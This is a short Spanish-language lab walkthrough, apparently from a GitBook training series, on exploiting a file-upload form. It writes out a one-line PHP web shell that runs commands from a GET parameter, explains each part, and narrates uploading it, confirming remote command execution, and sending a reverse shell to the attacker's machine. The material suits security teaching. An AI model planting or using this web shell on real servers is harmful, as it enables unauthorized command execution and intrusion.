# Laboratorio 1

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FTcvpOZECWLzCZNhp09Ad%2F00.png?alt=media&#x26;token=db0ba4d0-9d56-4765-b6f3-abc270524911" alt=""><figcaption></figcaption></figure>

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FL0rJeFBTMUBge0H3We82%2F1.png?alt=media&#x26;token=b0c0d4df-2330-4ed9-ac63-4260fe6786f4" alt=""><figcaption></figcaption></figure>

Vamos crearnos un archivo shell.php que es el cual usaremos en todos los laboratorios.

El código PHP `<?php system($_GET['cmd']); ?>`, es un ejemplo de cómo se puede ejecutar un comando del sistema operativo a través de una solicitud HTTP utilizando el método GET. Aquí hay una explicación paso a paso:

1. `<?php`: Esto indica el comienzo de un bloque de código PHP.
2. `system()`: Esta es una función en PHP que se utiliza para ejecutar comandos del sistema operativo. Toma como argumento una cadena que contiene el comando que se desea ejecutar.
3. `$_GET['cmd']`: Esta es una forma de acceder a los parámetros pasados a través de la URL utilizando el método GET. En este caso, el código PHP espera que se pase un parámetro llamado 'cmd' a través de la URL.

Entonces, si alguien visita una URL como esta, <http://tudominio.com/tuarchivo.php?cmd=ls>

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FjlBK0uDCQvFS6bSQLk16%2F2.png?alt=media&#x26;token=2b985b3e-3868-4375-915f-61b746cc64f8" alt=""><figcaption></figcaption></figure>

En la primer laboratorio subimos y nos da la ruta donde se aloja el archivo.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FlzDGlYSvp2opGdFHgPBl%2F3.png?alt=media&#x26;token=e5f75359-8593-4150-a5ed-1738995c453e" alt=""><figcaption></figcaption></figure>

Si invocamos el archivo sunido y hacemos un id observamos que tenemos ejecucion remota de comandos.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2Fo1ItQ08R9vkGIwCogf7h%2F4.png?alt=media&#x26;token=785ed26f-f0c9-4069-8880-d1eac6552ccc" alt=""><figcaption></figcaption></figure>

Ahora como controlamos todo el input pues nos enviamos una revershell a nuestra maquina de atacante.

***

<figure><img src="https://1827363921-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEGJvvgIusdsLKeoExX1C%2Fuploads%2FUxpEnbH75UVn6dJwXo4m%2F5.png?alt=media&#x26;token=f1d4aaaf-20c4-4159-b611-d0282ac72d12" alt=""><figcaption></figcaption></figure>

Tenemos la conexion y ahora estamos dentro de la maquina&#x20;
